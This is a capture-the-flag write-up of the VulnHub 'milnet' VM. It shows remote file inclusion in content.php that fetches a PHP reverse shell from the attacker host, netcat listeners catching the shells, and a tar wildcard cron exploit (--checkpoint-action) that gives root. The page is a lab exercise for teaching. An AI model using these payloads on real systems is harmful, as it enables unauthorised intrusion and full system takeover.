Nmap scan result:
Nmap scan report for 192.168.0.109
Host is up, received arp-response (0.00048s latency).
Scanned at 2016-06-17 22:09:01 CST for 36s
Not shown: 998 closed ports
Reason: 998 resets
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 00:0C:29:E7:D8:D2 (VMware)
Limited Shell
This machine is running a simple http server on port 80. These files were found after scanning with dirbuster:
File found: /index.php - 200
File found: /content.php - 200
File found: /main.php - 200
File found: /info.php - 200
File found: /bomb.php - 200
File found: /props.php - 200
File found: /info.php - 200
Except the info.php showed the result of phpinfo(), there is nothing useful in other pages. But something caught my eye. When I was browsing content.php, the result is same as main.php. So I decided to examine deeper with burpsuite.
POST /content.php HTTP/1.1
Host: 192.168.0.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.2.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.0.109/nav.php
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
route=main
When I clicked on the ‘Main’ button, it was trigged to POST to content.php with a parameter route=main. And so do the ‘Bomb’ and the ‘Props’ buttons.
It seems to be a chance of File Inclusion vulnerability. First I made some attempts for Local File Inclusion. It is okay to use the relative path traversal to get to the file like: route=../../../../../var/www/html/main. But all I can do is to include files with .php extension. Putting a ‘%00’ at the end did not help.
Next I tried to include a reverse shell from my machine.
POST /content.php HTTP/1.1
Host: 192.168.0.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.2.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.0.109/nav.php
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
route=http://192.168.0.105/php-reverse-shell.txt?
The .php problem can be bypassed by putting a ‘?’ at the end of the line. And this time I got a shell back on my machine.
# nc -lvp 6666
listening on [any] 6666 ...
192.168.0.109: inverse host lookup failed: Unknown host
connect to [192.168.0.105] from (UNKNOWN) [192.168.0.109] 50118
Linux seckenheim.net.mil 4.4.0-22-generic #40-Ubuntu SMP Thu May 12 22:03:46 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
16:42:41 up 6:39, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
Privilege Escalation
After doing some enumeration, I found a suspicious cron job in /etc/crontab.
$ cat /etc/crontab
---snip---
# m h dom mon dow user command
*/1 * * * * root /backup/backup.sh
---snip---
And here’s what backup.sh does:
#!/bin/bash
cd /var/www/html
tar cf /backup/backup.tgz *
It uses the tar command to compact the whole directory of /var/www/html/ every minutes.
And here comes the wildcard exploit again. We have done this before while messing with PIPE. We can use the same technique to escalate to root privilege.
This time I’ll use the php command to open another php reverse shell.
On milnet:
$ cd /var/www/html
$ echo > --checkpoint=1
$ echo > --checkpoint-action=exec=sh\ shell.sh
$ wget http://192.168.0.105/php-reverse-shell.txt -O prs.php
--2016-06-18 18:12:37-- http://192.168.0.105/php-reverse-shell.txt
Connecting to 192.168.0.105:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5495 (5.4K) [text/plain]
Saving to: 'prs.php'
0K ..... 100% 875M=0s
2016-06-18 18:12:37 (875 MB/s) - 'prs.php' saved [5495/5495]
$ sed -i s/6666/8888/g prs.php
$ echo 'php prs.php &' > shell.sh
$ chmod +x shell.sh
When the backup.sh is triggered, we’ll get the shell pop with root.
===
# nc -lvp 8888
listening on [any] 8888 ...
192.168.0.109: inverse host lookup failed: Unknown host
connect to [192.168.0.105] from (UNKNOWN) [192.168.0.109] 36284
Linux seckenheim.net.mil 4.4.0-22-generic #40-Ubuntu SMP Thu May 12 22:03:46 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
15:14:02 up 5:10, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# cat /root/credits.txt
,----,
,/ .`|
,` .' : ,---, ,---,.
; ; /,--.' | ,' .' | ,---,
.'___,/ ,' | | : ,---.' | ,---, ,---.'|
| : | : : : | | .' ,-+-. / | | | :
; |.'; ; : | |,--. ,---. : : |-, ,--.'|' | | | |
`----' | | | : ' | / \ : | ;/|| | ,"' | ,--.__| |
' : ; | | /' : / / | | : .'| | / | | / ,' |
| | ' ' : | | |. ' / | | | |-,| | | | |. ' / |
' : | | | ' | :' ; /| ' : ;/|| | | |/ ' ; |: |
; |.' | : :_:,'' | / | | | \| | |--' | | '/ '
'---' | | ,' | : | | : .'| |/ | : :|
`--'' \ \ / | | ,' '---' \ \ /
`----' `----' `----'
This was milnet for #vulnhub by @teh_warriar
I hope you enjoyed this vm!
If you liked it drop me a line on twitter or in #vulnhub.
I hope you found the clue:
/home/langman/SDINET/DefenseCode_Unix_WildCards_Gone_Wild.txt
I was sitting on the idea for using this technique for a BOOT2ROOT VM prives for a long time...
This VM was inspired by The Cuckoo's Egg.
If you have not read it give it a try:
http://www.amazon.com/Cuckoos-Egg-Tracking-Computer-Espionage/dp/1416507787/